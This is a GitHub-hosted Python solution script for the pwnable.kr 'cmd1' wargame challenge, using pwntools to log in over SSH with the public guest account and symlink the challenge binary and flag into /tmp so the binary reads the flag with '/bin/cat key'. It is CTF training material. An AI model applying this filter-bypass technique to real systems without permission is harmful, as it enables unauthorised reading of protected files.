-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
40 lines (36 loc) · 1.32 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
"""
In this challenge we have a binary that plays with PATH variable, but it's nothing difficult to do here.
Just go to /tmp and create a new folder with soft links on cmd1 and flag.
"""
from pwn import *
from random import randint
def exploit():
# connect
s = ssh(user='cmd1', host='pwnable.kr', password='guest', port=2222)
# rand number which will be our folder name
rand_foldername = str(randint(10, 300))
print(f'Create folder with name {rand_foldername}')
# parts of oneliner
cmd1 = 'cd /tmp'
cmd2 = 'mkdir ' + rand_foldername
cmd3 = 'cd ' + rand_foldername
ln_s = 'ln -s '
cmd4 = ln_s + '~/cmd1 cmd1'
cmd5 = ln_s + '~/flag key'
all_cmd = ' && '.join([cmd1, cmd2, cmd3, cmd4, cmd5])
print(f'Sent next command: {all_cmd}')
s.process(all_cmd, shell=True)
# Execute our binary
execute_bin = "./cmd1 '/bin/cat key'"
p = s.process(executable='./cmd1', argv=['./cmd1', '/bin/cat key'], cwd='/tmp/' + rand_foldername)
print(p.recvall().decode('utf-8'))
p.close()
# Clean the remaining files and folder
cd = 'cd /tmp/' + rand_foldername
rm_files = 'rm cmd1 key'
cd_prev = 'cd ..'
rm_folder = 'rmdir ' + rand_foldername
cmd = ' && '.join([cd, rm_files, cd_prev, rm_folder])
s.process(cmd, shell=True)
if __name__=='__main__':
exploit()